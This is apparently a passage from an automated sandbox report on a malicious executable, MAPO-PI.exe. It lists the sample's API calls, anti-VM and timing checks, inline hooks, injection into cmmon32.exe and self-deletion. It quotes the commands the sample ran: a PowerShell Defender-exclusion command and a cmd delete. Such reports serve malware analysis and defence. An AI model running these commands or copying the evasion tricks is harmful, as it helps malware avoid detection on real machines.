          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9560 NtWriteFile,3_2_018D9560
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9FE0 NtCreateMutant,3_2_018D9FE0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA710 NtOpenProcessToken,3_2_018DA710
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9730 NtQueryVirtualMemory,3_2_018D9730
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9760 NtOpenProcess,3_2_018D9760
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018DA770 NtOpenThread,3_2_018DA770
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9770 NtSetInformationFile,3_2_018D9770
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D96D0 NtCreateKey,3_2_018D96D0
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9610 NtEnumerateValueKey,3_2_018D9610
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9650 NtQueryValueKey,3_2_018D9650
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D9670 NtQueryInformationProcess,3_2_018D9670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95D0 NtClose,LdrInitializeThunk,16_2_04CA95D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9540 NtReadFile,LdrInitializeThunk,16_2_04CA9540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96D0 NtCreateKey,LdrInitializeThunk,16_2_04CA96D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_04CA96E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9650 NtQueryValueKey,LdrInitializeThunk,16_2_04CA9650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_04CA9660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9FE0 NtCreateMutant,LdrInitializeThunk,16_2_04CA9FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9780 NtMapViewOfSection,LdrInitializeThunk,16_2_04CA9780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9710 NtQueryInformationToken,LdrInitializeThunk,16_2_04CA9710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9840 NtDelayExecution,LdrInitializeThunk,16_2_04CA9840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_04CA9860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99A0 NtCreateSection,LdrInitializeThunk,16_2_04CA99A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_04CA9910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A50 NtCreateFile,LdrInitializeThunk,16_2_04CA9A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA95F0 NtQueryInformationFile,16_2_04CA95F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9560 NtWriteFile,16_2_04CA9560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9520 NtWaitForSingleObject,16_2_04CA9520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAAD30 NtSetContextThread,16_2_04CAAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9670 NtQueryInformationProcess,16_2_04CA9670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9610 NtEnumerateValueKey,16_2_04CA9610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA97A0 NtUnmapViewOfSection,16_2_04CA97A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9760 NtOpenProcess,16_2_04CA9760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA770 NtOpenThread,16_2_04CAA770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9770 NtSetInformationFile,16_2_04CA9770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA710 NtOpenProcessToken,16_2_04CAA710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9730 NtQueryVirtualMemory,16_2_04CA9730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98F0 NtReadVirtualMemory,16_2_04CA98F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA98A0 NtWriteVirtualMemory,16_2_04CA98A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAB040 NtSuspendThread,16_2_04CAB040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9820 NtEnumerateKey,16_2_04CA9820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA99D0 NtCreateProcessEx,16_2_04CA99D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9950 NtQueueApcThread,16_2_04CA9950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A80 NtOpenDirectoryObject,16_2_04CA9A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A00 NtProtectVirtualMemory,16_2_04CA9A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A10 NtQuerySection,16_2_04CA9A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9A20 NtResumeThread,16_2_04CA9A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CAA3B0 NtGetContextThread,16_2_04CAA3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA9B00 NtSetValueKey,16_2_04CA9B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F30 NtAllocateVirtualMemory,16_2_03049F30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E00 NtReadFile,16_2_03049E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E80 NtClose,16_2_03049E80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D50 NtCreateFile,16_2_03049D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049F2D NtAllocateVirtualMemory,16_2_03049F2D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049E7A NtClose,16_2_03049E7A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049D4A NtCreateFile,16_2_03049D4A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DA2 NtCreateFile,16_2_03049DA2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03049DFB NtReadFile,16_2_03049DFB
          Source: MAPO-PI.exeBinary or memory string: OriginalFilename vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000000.232786703.0000000000ECA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000002.293450051.0000000001859000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs MAPO-PI.exe
          Source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MAPO-PI.exe
          Source: MAPO-PI.exeBinary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
          Source: MAPO-PI.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: MAPO-PI.exeVirustotal: Detection: 30%
          Source: MAPO-PI.exeReversingLabs: Detection: 39%
          Source: MAPO-PI.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\MAPO-PI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\MAPO-PI.exe 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\MAPO-PI.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/5@3/3
          Source: C:\Users\user\Desktop\MAPO-PI.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: MAPO-PI.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\MAPO-PI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: MAPO-PI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: MAPO-PI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: MAPO-PI.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.MAPO-PI.exe.eb0000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_004170AC push eax; retf 3_2_004170AF
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_00417A47 push edx; ret 3_2_00417A48
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0040ED75 push 00000051h; retf 3_2_0040ED79
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018ED0D1 push ecx; ret 3_2_018ED0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CBD0D1 push ecx; ret 16_2_04CBD0E4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_03047A47 push edx; ret 16_2_03047A48
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_030470AC push eax; retf 16_2_030470AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CF5C push eax; ret 16_2_0304CF62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEA5 push eax; ret 16_2_0304CEF8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEF2 push eax; ret 16_2_0304CEF8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0304CEFB push eax; ret 16_2_0304CF62
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_0303ED75 push 00000051h; retf 16_2_0303ED79

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 0.2.MAPO-PI.exe.25fd0c0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: MAPO-PI.exe PID: 3868, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003039B4E second address: 0000000003039B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 1752 Thread sleep time: -43348s >= -30000s
          Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 2952 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1552 Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4856 Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6932 Thread sleep time: -65000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5905
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2572
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 43348
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.278762456.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.273464193.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.272236107.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.258291932.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\MAPO-PI.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018BC182 mov eax, dword ptr fs:[00000030h] 3_2_018BC182
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h]3_2_018BA830
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]3_2_018B0050
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B0050 mov eax, dword ptr fs:[00000030h]3_2_018B0050
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01961074 mov eax, dword ptr fs:[00000030h]3_2_01961074
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01952073 mov eax, dword ptr fs:[00000030h]3_2_01952073
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]3_2_018A1B8F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A1B8F mov eax, dword ptr fs:[00000030h]3_2_018A1B8F
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194D380 mov ecx, dword ptr fs:[00000030h]3_2_0194D380
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C2397 mov eax, dword ptr fs:[00000030h]3_2_018C2397
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CB390 mov eax, dword ptr fs:[00000030h]3_2_018CB390
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195138A mov eax, dword ptr fs:[00000030h]3_2_0195138A
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]3_2_018C4BAD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]3_2_018C4BAD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C4BAD mov eax, dword ptr fs:[00000030h]3_2_018C4BAD
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01965BA5 mov eax, dword ptr fs:[00000030h]3_2_01965BA5
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]3_2_019153CA
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019153CA mov eax, dword ptr fs:[00000030h]3_2_019153CA
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BDBE9 mov eax, dword ptr fs:[00000030h]3_2_018BDBE9
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C03E2 mov eax, dword ptr fs:[00000030h]3_2_018C03E2
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov ecx, dword ptr fs:[00000030h]3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019423E3 mov eax, dword ptr fs:[00000030h]3_2_019423E3
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BA309 mov eax, dword ptr fs:[00000030h]3_2_018BA309
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195131B mov eax, dword ptr fs:[00000030h]3_2_0195131B
